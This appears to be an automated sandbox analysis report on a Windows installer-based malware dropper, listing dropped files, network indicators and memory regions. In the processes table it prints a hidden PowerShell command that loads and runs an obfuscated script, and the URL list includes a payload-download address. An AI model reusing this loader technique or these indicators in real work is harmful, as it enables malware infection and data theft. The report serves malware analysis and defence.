Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ORDER893474849.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Huaca.dew
|
ASCII text, with very long lines (54338), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\ORDER893474849.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxhzbllh.4ko.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4pmdflj.yaj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\freebl3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mozglue.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\msvcp140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsi10C5.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nss3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Temp\softokn3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\vcruntime140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\F..wIo..tmp
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Indebrug.Han
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Pronominalize.nic
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sialostenosis230.iso
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\ORDER893474849.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\fodlanges.txt
|
ASCII text, with very long lines (319), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\fodsaalerne.ima
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\nomophylax.lop
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\overfrankere.akt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\poetizer.pon
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\snidest.epe
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Sorbate\tipple.tak
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\amtstue.sub
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\bevidsthedsdannende.syn
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\brnderen.gun
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\conducing.red
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\elvinus.bkk
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\njuxKgb.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie
0xe, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Roaming\rmbuDux.tmp
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Roaming\zmCxFCu.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
There are 23 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\ORDER893474849.exe
|
"C:\Users\user\Desktop\ORDER893474849.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Jasigers=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Huaca.dew';$Realismen=$Jasigers.SubString(54269,3);.$Realismen($Jasigers)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://72.11.156.201/ShQvl29.bin
|
72.11.156.201
|
||
http://www.mozilla.com/en-US/blocklist/
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://ocsp.thawte.com0
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.mozilla.com0
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://github.com/syohex/java-simple-mine-sweeperC:
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
onye.unicornsupplychains.com
|
38.255.61.163
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
38.255.61.163
|
onye.unicornsupplychains.com
|
United States
|
||
72.11.156.201
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
|
MaxConnectionsPer1_0Server
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
|
MaxConnectionsPerServer
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
23A70000
|
heap
|
page read and write
|
||
9308000
|
direct allocation
|
page execute and read and write
|
||
75D6000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23A78000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
3140000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
23512000
|
heap
|
page read and write
|
||
23920000
|
direct allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
6FCE000
|
stack
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
581000
|
heap
|
page read and write
|
||
77DF000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7100000
|
direct allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7190000
|
direct allocation
|
page read and write
|
||
271A000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
49F2000
|
trusted library allocation
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
7646000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
23516000
|
heap
|
page read and write
|
||
A708000
|
direct allocation
|
page execute and read and write
|
||
7654000
|
heap
|
page read and write
|
||
881C000
|
stack
|
page read and write
|
||
6D4E1000
|
unkown
|
page execute read
|
||
2351F000
|
heap
|
page read and write
|
||
75E5000
|
heap
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
5ED9000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
88A0000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
33A0000
|
trusted library allocation
|
page read and write
|
||
84C0000
|
trusted library allocation
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
23D62000
|
heap
|
page read and write
|
||
23900000
|
direct allocation
|
page read and write
|
||
4AC0000
|
heap
|
page read and write
|
||
2714000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
4EE000
|
stack
|
page read and write
|
||
33B9000
|
trusted library allocation
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
23A78000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
4ED1000
|
trusted library allocation
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23567000
|
heap
|
page read and write
|
||
2716000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
24400000
|
trusted library allocation
|
page read and write
|
||
238C0000
|
direct allocation
|
page read and write
|
||
23A73000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2BEC000
|
stack
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
9240000
|
direct allocation
|
page execute and read and write
|
||
49F0000
|
trusted library allocation
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
7730000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23567000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
337E000
|
unkown
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
8497000
|
stack
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
23C67000
|
heap
|
page read and write
|
||
2DCD000
|
stack
|
page read and write
|
||
4A5000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
4EC9000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
8620000
|
trusted library allocation
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
3C60000
|
remote allocation
|
page execute and read and write
|
||
2351F000
|
heap
|
page read and write
|
||
8610000
|
trusted library allocation
|
page execute and read and write
|
||
2351F000
|
heap
|
page read and write
|
||
317B000
|
heap
|
page read and write
|
||
238A0000
|
direct allocation
|
page read and write
|
||
773E000
|
heap
|
page read and write
|
||
2355A000
|
heap
|
page read and write
|
||
2715000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7654000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
8AC0000
|
heap
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23567000
|
heap
|
page read and write
|
||
75FB000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
599A000
|
remote allocation
|
page execute and read and write
|
||
23511000
|
heap
|
page read and write
|
||
23B8A000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7619000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
445000
|
unkown
|
page readonly
|
||
75EE000
|
heap
|
page read and write
|
||
238B0000
|
direct allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
3055000
|
heap
|
page read and write
|
||
23D0F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
49E000
|
stack
|
page read and write
|
||
8AD0000
|
direct allocation
|
page execute and read and write
|
||
543A000
|
trusted library allocation
|
page read and write
|
||
7654000
|
heap
|
page read and write
|
||
2712000
|
heap
|
page read and write
|
||
2713000
|
heap
|
page read and write
|
||
893B000
|
heap
|
page read and write
|
||
3380000
|
trusted library section
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23A75000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
796E000
|
stack
|
page read and write
|
||
23736000
|
heap
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
71A0000
|
direct allocation
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
77E5000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
6D4E3000
|
unkown
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
4A98000
|
trusted library allocation
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
7160000
|
direct allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
4F2E000
|
trusted library allocation
|
page read and write
|
||
2F0C000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2F74000
|
heap
|
page read and write
|
||
238F0000
|
direct allocation
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
5025000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
4A80000
|
heap
|
page execute and read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
23880000
|
direct allocation
|
page read and write
|
||
238BE000
|
heap
|
page read and write
|
||
23569000
|
heap
|
page read and write
|
||
33A3000
|
trusted library allocation
|
page execute and read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2351E000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
2351C000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
4AC7000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2712000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2FB9000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
371E000
|
stack
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
4E4F000
|
stack
|
page read and write
|
||
23C90000
|
heap
|
page read and write
|
||
23A7F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
7622000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
7619000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2351E000
|
heap
|
page read and write
|
||
2354A000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
6D4E4000
|
unkown
|
page readonly
|
||
23511000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2351E000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page execute and read and write
|
||
2353C000
|
heap
|
page read and write
|
||
238BB000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23559000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
75DB000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
56B000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
70F0000
|
direct allocation
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
7120000
|
direct allocation
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
23880000
|
direct allocation
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
3040000
|
trusted library section
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
235A3000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
85A0000
|
trusted library allocation
|
page read and write
|
||
2719000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
84A0000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
79AE000
|
stack
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
23DB1000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
23A71000
|
heap
|
page read and write
|
||
774E000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
7628000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
27F0000
|
direct allocation
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
75E5000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
49F5000
|
trusted library allocation
|
page execute and read and write
|
||
2713000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
23EB7000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
8AB0000
|
trusted library allocation
|
page execute and read and write
|
||
2353C000
|
heap
|
page read and write
|
||
7637000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
85B0000
|
trusted library allocation
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2710000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
6079000
|
trusted library allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
6D4E0000
|
unkown
|
page readonly
|
||
7880000
|
trusted library allocation
|
page read and write
|
||
2F4B000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
760B000
|
heap
|
page read and write
|
||
C508000
|
direct allocation
|
page execute and read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
445000
|
unkown
|
page readonly
|
||
2352E000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
4E8C000
|
stack
|
page read and write
|
||
78E0000
|
heap
|
page execute and read and write
|
||
571000
|
heap
|
page read and write
|
||
23559000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
75EE000
|
heap
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23B64000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
571000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
271D000
|
heap
|
page read and write
|
||
88C3000
|
heap
|
page read and write
|
||
792E000
|
stack
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
7170000
|
direct allocation
|
page read and write
|
||
7870000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
7645000
|
heap
|
page read and write
|
||
23A7C000
|
heap
|
page read and write
|
||
23E68000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7150000
|
direct allocation
|
page read and write
|
||
7637000
|
heap
|
page read and write
|
||
23880000
|
direct allocation
|
page read and write
|
||
84B0000
|
trusted library allocation
|
page read and write
|
||
79ED000
|
stack
|
page read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
238BB000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
260E000
|
stack
|
page read and write
|
||
71B0000
|
direct allocation
|
page read and write
|
||
3D28000
|
remote allocation
|
page execute and read and write
|
||
23511000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
33C8000
|
heap
|
page read and write
|
||
23A77000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
75EE000
|
heap
|
page read and write
|
||
780E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
75F9000
|
heap
|
page read and write
|
||
8715000
|
trusted library allocation
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
856E000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
23A7C000
|
heap
|
page read and write
|
||
49EA000
|
trusted library allocation
|
page execute and read and write
|
||
23594000
|
heap
|
page read and write
|
||
5EF9000
|
trusted library allocation
|
page read and write
|
||
5F3A000
|
trusted library allocation
|
page read and write
|
||
238B0000
|
direct allocation
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
35BF000
|
stack
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
23E14000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
23BB0000
|
heap
|
page read and write
|
||
B108000
|
direct allocation
|
page execute and read and write
|
||
575000
|
heap
|
page read and write
|
||
7627000
|
heap
|
page read and write
|
||
23730000
|
direct allocation
|
page execute and read and write
|
||
23511000
|
heap
|
page read and write
|
||
7646000
|
heap
|
page read and write
|
||
7717000
|
trusted library allocation
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
760B000
|
heap
|
page read and write
|
||
2352D000
|
heap
|
page read and write
|
||
7F430000
|
trusted library allocation
|
page execute and read and write
|
||
571000
|
heap
|
page read and write
|
||
607F000
|
trusted library allocation
|
page read and write
|
||
23B3A000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
235A3000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page execute and read and write
|
||
75EE000
|
heap
|
page read and write
|
||
7050000
|
heap
|
page execute and read and write
|
||
75FC000
|
heap
|
page read and write
|
||
35C0000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
538000
|
heap
|
page read and write
|
||
4F9A000
|
remote allocation
|
page execute and read and write
|
||
33AD000
|
trusted library allocation
|
page execute and read and write
|
||
575000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
88F9000
|
heap
|
page read and write
|
||
75FC000
|
heap
|
page read and write
|
||
271B000
|
heap
|
page read and write
|
||
85C0000
|
trusted library allocation
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
2F72000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
2353C000
|
heap
|
page read and write
|
||
581000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
2351F000
|
heap
|
page read and write
|
||
23511000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
2EE8000
|
heap
|
page read and write
|
